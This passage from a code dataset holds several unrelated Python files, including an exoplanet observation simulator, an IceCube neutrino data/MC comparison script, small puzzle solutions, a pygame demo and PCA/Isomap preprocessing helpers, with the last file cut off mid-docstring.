15')\n\nmain()\n","sub_path":"FizzBuzz-easy.py","file_name":"FizzBuzz-easy.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"122219546","text":"busses = set()\narrival_time = -1\nwith open('input.txt', 'r') as f:\n line = f.readline()\n arrival_time = int(line[:-1])\n line = f.readline()\n busses.update(line[:-1].split(','))\nbusses.remove('x')\narrival_times = []\nfor bus in busses:\n arrival_times.append((int(bus) - (arrival_time % int(bus)), int(bus)))\n # arrival_times[i] = (waiting_time, bus_number)\nshortest_wait = sorted(arrival_times)[0]\nprint(shortest_wait[0] * shortest_wait[1])\n","sub_path":"day13/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"93291614","text":"import sys, timeit\n\n'''\nCreate a dictionary of various sizes and then time accessing an element of the dictionary\n'''\n\ndef setupDictionary(n):\n d = {}\n for i in range(n):\n key = f\"key{i}\"\n value = f\"value{i}\"\n d[key] = value\n return d\n\nd = {}\ndef timeDictionaryAccess(N):\n global d\n d = setupDictionary(N)\n statement = f\"\"\"v = d['key{N//2}']\"\"\"\n print(N, timeit.timeit(statement, globals=globals()))\n\ntimeDictionaryAccess(10)\ntimeDictionaryAccess(100)\ntimeDictionaryAccess(1000)\ntimeDictionaryAccess(10000)\ntimeDictionaryAccess(100000)\ntimeDictionaryAccess(1000000)\ntimeDictionaryAccess(10000000)\n \n","sub_path":"Python3/src/03 More on Data Types/Dictionaries/09_access_times_of_dict.py","file_name":"09_access_times_of_dict.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"494449542","text":"\nimport pysynphot as psyn\nfrom psisim import spectrum\nimport numpy as np\nimport scipy.interpolate as si\nimport scipy.integrate as integrate\n\ndef simulate_observation(telescope,instrument,planet_table_entry,planet_spectrum,wvs,spectrum_R,\n inject_noise=True,verbose=False,post_processing_gain = 10,return_noise_components=False):\n '''\n A function that simulates an observation\n\n Inputs:\n Telescope - A Telescope object\n Instrument - 
An Instrument object\n planet_table_entry - an entry/row from a Universe planet table\n planet_spectrum - A planet spectrum from simulate spectrum given in contrast units\n observing_configs - To be defined\n\n Outputs: \n F_lambda, F_lambda_error\n '''\n\n\n ##### ALL UNITS NEED TO BE PROPERLY EXAMINED #####\n\n #Some relevant planet properties\n separation = planet_table_entry['AngSep']/1000\n star_imag = planet_table_entry['StarImag']\n star_spt = planet_table_entry['StarSpT']\n\n #Get the stellar spectrum at the wavelengths of interest. \n #The stellar spectrum will be in units of photons/s/cm^2/angstrom\n stellar_spectrum = spectrum.get_stellar_spectrum(planet_table_entry,wvs,instrument.current_R,\n verbose=verbose)\n\n #Multiply the stellar spectrum by the collecting area and a factor of 10,000\n #to convert from m^2 to cm^2 and get the stellar spectrum in units of photons/s\n stellar_spectrum *= telescope.collecting_area*10000 # A factor of 10000 to convert the tles\n\n #Multiply by atmospheric transmission\n stellar_spectrum *= telescope.get_atmospheric_transmission(wvs)\n\n #Multiply by instrument throughputs\n stellar_spectrum *= instrument.get_inst_throughput(wvs)\n stellar_spectrum *= instrument.get_filter_transmission(wvs,instrument.current_filter)\n\n #Multiply by the quantum efficiency\n stellar_spectrum *= instrument.qe\n\n #Now let's put the planet spectrum back into physical units\n #This assumes that you have properly carried around 'wvs' \n #and that the planet_spectrum is given at the wvs wavelengths. \n scaled_spectrum = planet_spectrum*stellar_spectrum\n\n # Instrument and Sky thermal background in photons/s/cm^2/Angstrom\n thermal_sky = telescope.get_sky_background(wvs)\n thermal_sky *= instrument.get_inst_throughput(wvs)\n thermal_inst = instrument.get_instrument_background(wvs) # need to think about this\n thermal_flux = thermal_sky + thermal_inst\n thermal_flux *= telescope.collecting_area*10000 # phtons/s/Angstrom\n thermal_flux *= instrument.get_filter_transmission(wvs, instrument.current_filter)\n thermal_flux *= instrument.qe #e-/s/Angstrom\n\n #Downsample to instrument wavelength sampling\n detector_spectrum = []\n detector_stellar_spectrum = []\n detector_thermal_flux = []\n intermediate_spectrum = si.interp1d(wvs, scaled_spectrum)\n intermediate_stellar_spectrum = si.interp1d(wvs, stellar_spectrum)\n intermediate_thermal_spectrum = si.interp1d(wvs, thermal_flux)\n for inst_wv, inst_dwv in zip(instrument.current_wvs, instrument.current_dwvs):\n wv_start = inst_wv - inst_dwv/2.\n wv_end = inst_wv + inst_dwv/2.\n\n flux = 1e4*integrate.quad(intermediate_spectrum, wv_start, wv_end)[0] # detector spectrum now in e-/s (1e4 is for micron to angstrom conversion)\n stellar_flux = 1e4*integrate.quad(intermediate_stellar_spectrum, wv_start, wv_end)[0] # detector spectrum now in e-/s\n thermal_flux = 1e4*integrate.quad(intermediate_thermal_spectrum, wv_start, wv_end)[0] # detector spectrum now in e-/s\n detector_spectrum.append(flux)\n detector_stellar_spectrum.append(stellar_flux)\n detector_thermal_flux.append(thermal_flux)\n\n detector_spectrum = np.array(detector_spectrum)\n detector_stellar_spectrum = np.array(detector_stellar_spectrum)\n detector_thermal_flux = np.array(detector_thermal_flux)\n\n #Multiply by the exposure time\n detector_spectrum *= instrument.exposure_time #The detector spectrum is now in e-\n detector_stellar_spectrum *= instrument.exposure_time #The detector spectrum is now in e-\n detector_thermal_flux *= instrument.exposure_time\n\n 
#Multiply by the number of exposures\n detector_spectrum *= instrument.n_exposures\n detector_stellar_spectrum *= instrument.n_exposures\n detector_thermal_flux *= instrument.n_exposures\n\n ########################################\n ##### Now get the various noise sources:\n\n speckle_noise,read_noise,dark_noise,photon_noise = get_noise_components(separation,star_imag,instrument,\n instrument.current_wvs,star_spt,detector_stellar_spectrum,detector_spectrum,detector_thermal_flux)\n\n #Apply a post-processing gain\n speckle_noise /= post_processing_gain\n\n ## Sum it all up\n total_noise = np.sqrt(speckle_noise**2+read_noise**2+dark_noise**2+photon_noise**2)\n\n # Inject noise into spectrum\n if inject_noise:\n # For each point in the spectrum, draw from a normal distribution,\n # with a mean centered on the spectrum and the standard deviation\n # equal to the noise\n for i,noise in enumerate(total_noise):\n # import pdb; pdb.set_trace()\n detector_spectrum[i] = np.random.normal(detector_spectrum[i],noise)\n\n #TODO: Currently everything is in e-. We likely want it in a different unit at the end. \n \n if return_noise_components:\n return detector_spectrum, total_noise, np.array(detector_stellar_spectrum), np.array([speckle_noise,read_noise,dark_noise,photon_noise])\n else:\n return detector_spectrum, total_noise, np.array(detector_stellar_spectrum)\n\ndef get_noise_components(separation,star_imag,instrument,wvs,star_spt,stellar_spectrum,detector_spectrum,thermal_spectrum):\n '''\n Calculate all of the different noise contributions\n '''\n\n #### TODO include photon noise from the speckles\n \n # First is speckle noise.\n # Instrument.get_speckle_noise should return things in contrast units relative to the star\n speckle_noise = instrument.get_speckle_noise(separation,star_imag,instrument.current_filter,wvs,star_spt)[0]\n\n #Convert the speckle noise to photons\n speckle_noise *= stellar_spectrum \n\n # Multiply the read noise by sqrt(n_exposures)\n read_noise = speckle_noise*0.+np.sqrt(instrument.n_exposures)*instrument.read_noise\n \n #Add the dark_current to the spectrum and calculate dark noise. NEVERMIND NOT ADDING TO SPECTRUM RIGHT NOW\n dark_current = instrument.dark_current*instrument.exposure_time*instrument.n_exposures\n # detector_spectrum += dark_current\n dark_noise = speckle_noise*0.+np.sqrt(dark_current)\n\n #TODO:Add the background noise\n\n #Photon noise. Detector_spectrum should be in total of e- now.\n photon_noise = np.sqrt(detector_spectrum + thermal_spectrum + speckle_noise)\n\n return speckle_noise,read_noise,dark_noise,photon_noise\n\ndef simulate_observation_set(telescope, instrument, planet_table,planet_spectra,wvs,spectra_R,inject_noise=False,\n post_processing_gain=10,return_noise_components=False):\n '''\n Simulates observations of multiple planets, with the same observing configs\n \n Inputs:\n Telescope - A Telescope object\n Instrument - An Instrument object\n planet_table - a Universe planet table\n planet_spectra_list - A list of planet spectra. 
One for each entry in the planet table\n    inject_noise - choose whether or not to inject noise into the spectrum now or not\n\n\n    Outputs: \n    F_lambdas, F_lambda_errors\n    '''\n\n    n_planets = np.size(planet_table) #Not sure this will work\n\n    F_lambdas = []\n    F_lambdas_stellar = []\n    F_lambda_errors = []\n    noise_components = []\n\n    for i,planet in enumerate(planet_table):\n        if return_noise_components:\n            new_F_lambda,new_F_lambda_errors,new_F_lambda_stellar,F_lambda_noise_components = simulate_observation(telescope,instrument,\n                planet,planet_spectra[i], wvs, spectra_R, inject_noise = inject_noise, post_processing_gain=post_processing_gain,\n                return_noise_components=return_noise_components)\n            F_lambdas.append(new_F_lambda)\n            F_lambdas_stellar.append(new_F_lambda_stellar)\n            F_lambda_errors.append(new_F_lambda_errors)\n            noise_components.append(F_lambda_noise_components)\n        else:\n            new_F_lambda,new_F_lambda_errors,new_F_lambda_stellar = simulate_observation(telescope,instrument,\n                planet,planet_spectra[i], wvs, spectra_R, inject_noise = inject_noise, post_processing_gain=post_processing_gain)\n            F_lambdas.append(new_F_lambda)\n            F_lambdas_stellar.append(new_F_lambda_stellar)\n            F_lambda_errors.append(new_F_lambda_errors)\n\n\n    F_lambdas = np.array(F_lambdas)\n    F_lambdas_stellar = np.array(F_lambdas_stellar)\n    F_lambda_errors = np.array(F_lambda_errors)\n    noise_components = np.array(noise_components)\n    \n    if return_noise_components:\n        return F_lambdas,F_lambda_errors,F_lambdas_stellar, noise_components\n    else:\n        return F_lambdas,F_lambda_errors,F_lambdas_stellar\n\n\n\n\n","sub_path":"psisim/observation.py","file_name":"observation.py","file_ext":"py","file_size_in_byte":9090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"67204242","text":"import json\nimport requests\nimport argparse\nfrom math import sin, cos, asin, sqrt, radians\n\n\ndef load_data(filepath):\n    with open(filepath, 'r') as json_file:\n        return json.load(json_file)\n\n\ndef get_biggest_bar(data):\n    return max([item for item in data], key=lambda x: x['Cells']['SeatsCount'])\n\n\ndef get_smallest_bar(data):\n    return min([item for item in data], key=lambda x: x['Cells']['SeatsCount'])\n\n\ndef haversine(lon1, lat1, lon2, lat2):\n    lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n    dlon = lon2 - lon1\n    dlat = lat2 - lat1\n    angle = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n    radian_length = 2 * asin(sqrt(angle))\n    radius = 6371\n    return radian_length * radius\n\n\ndef get_closest_bar(data, longitude, latitude):\n    random_bar = data[0]\n    min_length = haversine(\n        longitude,\n        latitude,\n        random_bar['Cells']['geoData']['coordinates'][0],\n        random_bar['Cells']['geoData']['coordinates'][1],\n    )\n    bar = random_bar\n    for item in data[1:]:\n        bar_longitude, bar_latitude = item['Cells']['geoData']['coordinates']\n        length = haversine(longitude, latitude, bar_longitude, bar_latitude)\n        if length < min_length:\n            min_length = length\n            bar = item\n    return bar\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    parser.add_argument('-p', '--path', help='Path to file', required=True)\n    args = parser.parse_args()\n\n    bars = load_data(args.path)\n    print('The biggest bar: ', get_biggest_bar(bars)['Cells']['Name'])\n    print('The smallest bar: ', get_smallest_bar(bars)['Cells']['Name'])\n    longitude = float(input('Type longitude: '))\n    latitude = float(input('Type latitude: '))\n    print(\n        'The closest bar: ',\n        get_closest_bar(bars, longitude, latitude)['Cells']['Name'],\n    
)\n","sub_path":"bars.py","file_name":"bars.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"532340923","text":"import pygame as pg\r\nfrom pygame.math import Vector2\r\n\r\n\r\nclass Entity(pg.sprite.Sprite):\r\n\r\n def __init__(self, pos, *groups):\r\n super().__init__(*groups)\r\n self.image = pg.Surface((50, 30), pg.SRCALPHA) # A transparent image.\r\n # Draw a triangle onto the image.\r\n pg.draw.polygon(self.image, pg.Color('dodgerblue2'),\r\n ((0, 0), (50, 15), (0, 30)))\r\n # A reference to the original image to preserve the quality.\r\n self.orig_image = self.image\r\n self.rect = self.image.get_rect(center=pos)\r\n self.vel = Vector2(0, 0)\r\n self.pos = Vector2(pos)\r\n self.gol = (300, 300)\r\n\r\n def update(self, *args):\r\n # Subtract the pos vector from the mouse pos to get the heading,\r\n # normalize this vector and multiply by the desired speed.\r\n # self.vel = (pg.mouse.get_pos() - self.pos).normalize() * 5\r\n\r\n if args and args[0] is not None:\r\n\r\n if args[0].key == pg.K_w:\r\n self.vel = (((self.rect.topright[0] - self.rect.x) // 2 + self.rect.x,\r\n self.rect.top) - self.pos).normalize() * 5\r\n self.pos += self.vel \r\n self.rect.center = self.pos\r\n if args[0].key == pg.K_SPACE:\r\n pass\r\n if args[0].key == pg.K_s:\r\n self.vel = (((self.rect.topright[0] - self.rect.x) // 2 + self.rect.x,\r\n self.rect.top) - self.pos).normalize() * 5\r\n self.pos -= self.vel\r\n self.rect.center = self.pos\r\n\r\n if args[0].key == pg.K_d:\r\n radius, angle = self.vel.as_polar()\r\n if args[0].key == pg.K_a:\r\n pass\r\n # Update the position vector and the rect.\r\n # self.pos += self.vel\r\n # self.rect.center = self.pos\r\n\r\n # Rotate the image.\r\n # 'Vector2.as_polar' returns the polar coordinates (radius and angle).\r\n radius, angle = self.vel.as_polar()\r\n # self.image = pg.transform.rotozoom(self.orig_image, -angle, 1)\r\n # self.rect = self.image.get_rect(center=self.rect.center)\r\n\r\n\r\ndef main():\r\n screen = pg.display.set_mode((640, 480))\r\n clock = pg.time.Clock()\r\n all_sprites = pg.sprite.Group()\r\n entity = Entity((100, 300), all_sprites)\r\n\r\n done = False\r\n\r\n while not done:\r\n for event in pg.event.get():\r\n if event.type == pg.QUIT:\r\n done = True\r\n if event.type == pg.KEYDOWN:\r\n all_sprites.update(event)\r\n\r\n screen.fill((30, 30, 30))\r\n all_sprites.update(None)\r\n all_sprites.draw(screen)\r\n\r\n pg.display.flip()\r\n clock.tick(30)\r\n\r\n\r\nif __name__ == '__main__':\r\n pg.init()\r\n main()\r\n pg.quit()\r\n","sub_path":"prob2.py","file_name":"prob2.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"625559636","text":"# https://leetcode.com/problems/two-sum/submissions/\n\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n dict = {}\n index = -1\n \n # First throw the entire array into a dictory with the index value\n for num in nums:\n index += 1\n dict[num] = index\n\n index = -1\n # Go through each element again\n for num in nums:\n index += 1\n # Find what the other value needs to be\n candidate = target - num\n \n # Look up that value\n if candidate in dict:\n # Can't be the same value\n if dict[candidate] == index:\n continue\n # Return the two indexes whose sum equals the target\n return [index, dict[candidate]]\n 
","sub_path":"two-sum.py","file_name":"two-sum.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"140843227","text":"def prime(n):\n k=5\n k2=2\n\n if n==2 or n==3:\n return True\n elif n%2==0 or n%3==0:\n return False\n else:\n while (k<=n):\n if k==n:\n return True\n elif n%k==0:\n return False\n else:\n k+=k2\n k2=6-k2 \n \n\nn=input(\"請輸入正整數:\")\n\nis_prime=False\nmax_prime=0\nfor i in range(0,len(n)):\n for j in range(i,len(n)):\n if (prime(int(n[i:j+1]))):\n if (int(n[i:j+1])>max_prime):\n max_prime= int(n[i:j+1])\n is_prime=True\n\nif (is_prime):\n print(\"子字串中最大的質數為:%d\" %(max_prime))\nelse:\n print(\"子字串中最大的質數為:No prime found\")\n\n\n\n","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"423056657","text":"#!/bin/sh /cvmfs/icecube.opensciencegrid.org/py2-v2/icetray-start\n#METAPROJECT icerec/V05-00-05\n\nfrom __future__ import division\nimport os\nimport sys\nfrom optparse import OptionParser\n\nimport numpy as np\nimport scipy as ci \nimport matplotlib\nmatplotlib.use('agg') # no 'plt.show()' any more; able to save to file, not render a window! \nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nfrom scipy.optimize import curve_fit\n# from mpl_toolkits.mplot3d import Axes3D\n\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import normalize\nimport tables \nimport pickle \n\n### n_file for weighting: (Jul 29, 2019). Accounted goodrunlist. \n# 11374: 18989\n# 11477: 19956\n# 11981: 19956\n# 11057: 72701\n# Livetime of processed 2012 data = 2813559.84254\n# Livetime of processed 2013 data = 2955469.73138\n# Livetime of processed 2014 data = 3052686.52963\n# Livetime of processed 2015 data = 3240653.63454\n# Livetime of processed 2016 data = 2919677.64478\n\n# NOTE: This file checks the validity of Mirco's dnn as a feature, and do data/MC comparison. \n\n\n\" ===== I/O ===== \"\n\nfig_dir = '/data/user/yanglyu/my_proj/analysis_1_downgoing_neutrino/1_distribution_plots/plots/5-3_' # save fig to dir\n\nlifetime = 86400*365\n\n\n# corsika weight adjustment parameters \n\" ----- corsika weight adjustment from file 1-0_ ----- \"\nparams = np.loadtxt('/data/user/yanglyu/my_proj/analysis_1_downgoing_neutrino/1_distribution_plots/weight_corsika_adjust.txt')\ndef adjust(ff): # must pass in LOG of energy!!! \n a, b, c = params[0],params[1],params[2]\n return a*(ff-b)**2 + c\n\n\n\n' 1) ===== total MC distribution ===== '\n\nwith tables.open_file('/data/user/yanglyu/my_proj/analysis_1_downgoing_neutrino/data/corsika_h5/corsika_11057.h5','r') as f:\n n_file = 72701 # modified\n\n signal_dnn_corsika = f.root.DeepLearningReco_nersc_gnn_weighted_02.cols.is_signal[:]\n weight_corsika = f.root.Weight_GaisserH4a.cols.value[:] * lifetime/n_file \n\nwith tables.open_file('/data/user/yanglyu/my_proj/analysis_1_downgoing_neutrino/data/nugen_h5/nugen_11374.h5','r') as f:\n n_file = 18989\n\n signal_dnn_numu = f.root.DeepLearningReco_nersc_gnn_weighted_02.cols.is_signal[:]\n ### astrophysical ###\n energy = f.root.MCPrimary.cols.energy[:]\n OneWeight = f.root.I3MCWeightDict.cols.OneWeight[:]\n NEvents = f.root.I3MCWeightDict.cols.NEvents[:]\n weight_numu_astro = (6.7 * 10**(-18))/6 * (energy/10**5)**(-2) * OneWeight/(n_file * NEvents) * lifetime * 2 # 10**5: 100 TeV. 
2 is nu+nubar\n\nplt.figure(figsize=(8,7))\nplt.hist(signal_dnn_corsika,bins=200,range=[0.,1],weights=weight_corsika,histtype='step',label='corsika',color='dodgerblue',log=True,bottom=10**(-6))\nplt.hist(signal_dnn_numu,bins=200,range=[0.,1],weights=weight_numu_astro,histtype='step',label='numu',color='darkorange',log=True,bottom=10**(-6))\nplt.xlim(0.,1)\nplt.ylim(10**(-6),3*10**(5))\nplt.title(\"Mirco's DNN signal probability\")\nplt.legend()\nplt.xlabel('Signal probability')\nplt.ylabel('Events/year')\nplt.savefig(fig_dir + 'rf_mirco_dnn.png',dpi=300)\nplt.savefig(fig_dir + 'rf_mirco_dnn.pdf')\n\n\n\n\n\n\n' 2) ===== train/untrained dnn score comparison ====='\n\nprint('loading corsika...')\nwith tables.open_file('/data/user/yanglyu/my_proj/analysis_1_downgoing_neutrino/data/corsika_h5/corsika_11057_trained.h5','r') as f:\n n_file = 72701 # modified\n\n signal_dnn_corsika_trained = f.root.DeepLearningReco_nersc_gnn_weighted_02.cols.is_signal[:]\n weight_corsika_trained = f.root.Weight_GaisserH4a.cols.value[:] * lifetime/n_file * 903187/424317\n\nwith tables.open_file('/data/user/yanglyu/my_proj/analysis_1_downgoing_neutrino/data/nugen_h5/nugen_11374_trained.h5','r') as f:\n n_file = 18989\n\n signal_dnn_numu_trained = f.root.DeepLearningReco_nersc_gnn_weighted_02.cols.is_signal[:]\n ### astrophysical ###\n energy = f.root.MCPrimary.cols.energy[:]\n OneWeight = f.root.I3MCWeightDict.cols.OneWeight[:]\n NEvents = f.root.I3MCWeightDict.cols.NEvents[:]\n weight_numu_astro_trained = (6.7 * 10**(-18))/6 * (energy/10**5)**(-2) * OneWeight/(n_file * NEvents) * lifetime * 2 * 20964/20142 # 10**5: 100 TeV. 2 is nu+nubar\n\nwith tables.open_file('/data/user/yanglyu/my_proj/analysis_1_downgoing_neutrino/data/corsika_h5/corsika_11057_untrained.h5','r') as f:\n n_file = 72701 # modified\n\n signal_dnn_corsika_untrained = f.root.DeepLearningReco_nersc_gnn_weighted_02.cols.is_signal[:]\n weight_corsika_untrained = f.root.Weight_GaisserH4a.cols.value[:] * lifetime/n_file * 903187/478870\n\nwith tables.open_file('/data/user/yanglyu/my_proj/analysis_1_downgoing_neutrino/data/nugen_h5/nugen_11374_untrained.h5','r') as f:\n n_file = 18989\n\n signal_dnn_numu_untrained = f.root.DeepLearningReco_nersc_gnn_weighted_02.cols.is_signal[:]\n ### astrophysical ###\n energy = f.root.MCPrimary.cols.energy[:]\n OneWeight = f.root.I3MCWeightDict.cols.OneWeight[:]\n NEvents = f.root.I3MCWeightDict.cols.NEvents[:]\n weight_numu_astro_untrained = (6.7 * 10**(-18))/6 * (energy/10**5)**(-2) * OneWeight/(n_file * NEvents) * lifetime * 2 * 20964/822 # 10**5: 100 TeV. 2 is nu+nubar\n\n\n# NOTE: here, extract samples Mirco used for training/testing, and compare their scores. There SHOULD be no significant difference if want to use them as feature. 
\n\nplt.figure(figsize=(15,7))\n\nplt.subplot(121)\nplt.hist(signal_dnn_corsika_trained,bins=200,range=[0.,1],weights=weight_corsika_trained,histtype='step',label='corsika',log=True,bottom=10**(-6))\nplt.hist(signal_dnn_numu_trained,bins=200,range=[0.,1],weights=weight_numu_astro_trained,histtype='step',label='numu',log=True,bottom=10**(-6))\nplt.ylim(10**(-6),3*10**(5))\nplt.title(\"Mirco's DNN trained scores\")\nplt.legend()\nplt.xlabel('Signal probability')\nplt.ylabel('Events/year')\n\nplt.subplot(122)\nplt.hist(signal_dnn_corsika_untrained,bins=200,range=[0.,1],weights=weight_corsika_untrained,histtype='step',label='corsika',log=True,bottom=10**(-6))\nplt.hist(signal_dnn_numu_untrained,bins=200,range=[0.,1],weights=weight_numu_astro_untrained,histtype='step',label='numu',log=True,bottom=10**(-6))\nplt.ylim(10**(-6),3*10**(5))\nplt.title(\"Mirco's DNN untrained scores\")\nplt.legend()\nplt.xlabel('Signal probability')\nplt.ylabel('Events/year')\n\nplt.savefig(fig_dir + 'rf_check_train_untrained_mirco.png',bbox_inches='tight',dpi=300)\nplt.savefig(fig_dir + 'rf_check_train_untrained_mirco.pdf',bbox_inches='tight')\nplt.show()\n\n\n\n' 3) ===== data/MC comparison ====='\nexpo = 0.\nenergy_cut = 10**expo # 10**6.6\nexpo = int(expo)\n\nprint('loading corsika...')\nwith tables.open_file('/data/user/yanglyu/my_proj/analysis_1_downgoing_neutrino/data/corsika_h5/corsika_11057.h5','r') as f:\n n_file = 72701 # modified\n CUT_presel = (f.root.SPEFit4TruncatedEnergy_SPICEMie_DOMS_Muon.cols.energy[:] > energy_cut)\n\n chi2_red_corsika = f.root.Collection.cols.chi2[:][CUT_presel]/f.root.Collection.cols.NDF[:][CUT_presel]\n\n signal_dnn_corsika = f.root.DeepLearningReco_nersc_gnn_weighted_02.cols.is_signal[:][CUT_presel]\n weight_corsika = f.root.Weight_GaisserH4a.cols.value[:][CUT_presel] * lifetime/n_file * 903187/424317\n print(weight_corsika)\n # weight_corsika = weight_corsika * adjust(chi2_red_corsika) * (np.sum(weight_corsika)/np.sum( weight_corsika * adjust(chi2_red_corsika) ))\n print(weight_corsika)\n\nprint('loading data_burn...')\nwith tables.open_file('/data/user/yanglyu/my_proj/analysis_1_downgoing_neutrino/data/data_h5/data_burn.h5','r') as f:\n nfile_data = [2813559.84254, 2955469.73138, 3052686.52963, 3240653.63454, 2919677.64478] # _gaps.txt; 2012, 2013, 2014, 2015, 2016\n\n CUT_presel = (f.root.SPEFit4TruncatedEnergy_SPICEMie_DOMS_Muon.cols.energy[:] > energy_cut)\n\n signal_dnn_data = f.root.DeepLearningReco_nersc_gnn_weighted_02.cols.is_signal[:][CUT_presel]\n weight_data_burn = lifetime/np.sum(nfile_data) * np.ones(len(signal_dnn_data))\n\n\nplt.figure(figsize=(7,7))\nimport matplotlib.gridspec as gridspec\nplt.rcParams.update({'font.size': 19})\n\ngs = gridspec.GridSpec(2, 1, height_ratios=[4, 1])\nax1 = plt.subplot(gs[0])\n\nh,b,p = plt.hist(signal_dnn_corsika,bins=np.arange(0,1,0.02),range=[0.,1],weights=weight_corsika,histtype='step',label='corsika',log=True,bottom=10**(-6))\nhh,bb = np.histogram(signal_dnn_data,bins=np.arange(0,1,0.02),weights = weight_data_burn)\nplt.plot((bb[1:]+bb[:-1])/2,hh,'.',ms=7,alpha=0.7,label='data burn',color='black')\nplt.xlim(0,1)\nplt.ylim(10**(-6),3*10**(6))\nplt.title(\"Mirco's DNN scores, data/MC\")\nplt.legend()\nax1.xaxis.set_major_locator(ticker.MultipleLocator(0.2))\nax1.xaxis.set_minor_locator(ticker.MultipleLocator(0.02))\nplt.ylabel('Events/year')\n\nax2 = plt.subplot(gs[1])\n# error of x/y: x = hh, y = h. x/y*sqrt(1/x+1/y). Only keep terms with value > 0. \ntmp = (hh > 0.) 
& (h > 0)\nh = h[tmp]\nbb = ((bb[1:]+bb[:-1])/2)[tmp]\nhh = hh[tmp]\nyerr = hh/h * np.sqrt( 1/hh + 1/h )\nplt.errorbar(bb, hh/h, yerr = yerr, fmt='.',color='black')\nplt.axhline(1,ls='--',lw=1,color='black')\n\nplt.xlabel('Signal probability')\nplt.ylabel('Data/MC')\nplt.xlim(0,1)\nplt.ylim(0,2)\nax2.xaxis.set_major_locator(ticker.MultipleLocator(0.2))\nax2.xaxis.set_minor_locator(ticker.MultipleLocator(0.02))\nax2.yaxis.set_major_locator(ticker.MultipleLocator(1.))\nax2.yaxis.set_minor_locator(ticker.MultipleLocator(0.2))\nplt.savefig(fig_dir+'hist1d_mirco_dataMC_comparison_E'+str(expo)+'.png',bbox_inches='tight',dpi=300)\nplt.savefig(fig_dir+'hist1d_mirco_dataMC_comparison_E'+str(expo)+'.pdf',bbox_inches='tight')\nplt.close()\n","sub_path":"5-3_check_mirco.py","file_name":"5-3_check_mirco.py","file_ext":"py","file_size_in_byte":9489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"23011518","text":"#import libraries\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom matplotlib import pyplot as plt\nfrom pandas.plotting import scatter_matrix\nfrom matplotlib import pyplot as plt\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.manifold import Isomap\n\n\ndef preprocess_data(data) :\n\n \"\"\"Preprocess the given dataset applying One-Hot encoding of categorical attributes and Standardization for numerical attributes.\n \n Parameters\n ----------\n data : pandas.core.frame.DataFrame\n The dataframe to be preprocessed\n\n Returns\n -------\n numpy.ndarray\n a matrix with the preprocessed data\n \"\"\"\n\n #get categorical attributes\n categorical_vars = data.select_dtypes(include=['category'])\n\n #label encoder each categorical attribute\n for c in categorical_vars.columns.tolist() :\n categorical_vars[c] = LabelEncoder().fit_transform(categorical_vars[c])\n\n #one-hot encode categorical variables\n onehot_encoder_x = OneHotEncoder()\n x_cat = onehot_encoder_x.fit_transform(categorical_vars).toarray()\n\n #standardize numerical variables\n numerical_vars = data.select_dtypes(include=['int64','float64'])\n x_num = StandardScaler().fit_transform(numerical_vars)\n\n #return the standardized numerical attributes stacked with the one-hot encoded categorical attributes\n return np.column_stack((x_num, x_cat))\n\n\ndef pca_transform(data_scaled, labels) :\n\n \"\"\"Compute the PCA transform from a scaled data.\n \n Parameters\n ----------\n data_scaled : numpy.ndarray\n A matrix with the scaled data to transform\n\n labels : numpy.ndarray\n Labels to assign to the transformed data (0 for real and 1 for synthetic)\n\n Returns\n -------\n pandas.core.frame.DataFrame\n a dataframe with the transformed data labelled\n \"\"\"\n\n #compute the PCA transform\n pca_transform = PCA(n_components=2).fit_transform(data_scaled)\n\n #append labels to the transformed data\n pca = np.append(pca_transform, labels, axis=1)\n\n #return a dataframe with the transformed data\n return pd.DataFrame(data=pca, columns=['PC1','PC2','Label'])\n\n\ndef isomap_transform(data_scaled, labels) :\n\n \"\"\"Compute the Isomap transform from a scaled data.\n \n Parameters\n ----------\n data_scaled : numpy.ndarray\n A matrix with the scaled data to transform\n\n labels : numpy.ndarray\n Labels to assign to the transformed data (0 for real and 1 for 
synthetic)\n\n Returns\n -------\n pandas.core.frame.DataFrame\n a dataframe with the transformed data labelled\n \"\"\"\n\n #compute the Isomap transform\n iso_transform = Isomap(n_components=2).fit_transform(data_scaled)\n\n #append labels to the transformed data\n iso = np.append(iso_transform, labels, axis=1)\n\n #return a dataframe with the transformed data\n return pd.DataFrame(data=iso, columns=['PC1','PC2','Label'])\n\n\ndef batch(iterable, n=1) :\n\n \"\"\"Create iterable batches from a dataframe.\n \n Parameters\n ----------\n iterable : numpy.ndarray\n A matrix to be divided in batches\n\n n : int\n Length of the batches to create\n \"\"\"\n\n #get length of the matrix to divide in batches\n l = len(iterable)\n\n #loop to divide the data into batches of length n\n for ndx in range(0, l, n):\n yield iterable[ndx:min(ndx + n, l)]\n\n\ndef isomap_transform_on_batch(data_scaled, labels) :\n\n \"\"\"Compute the Isomap transform on batch from a scaled 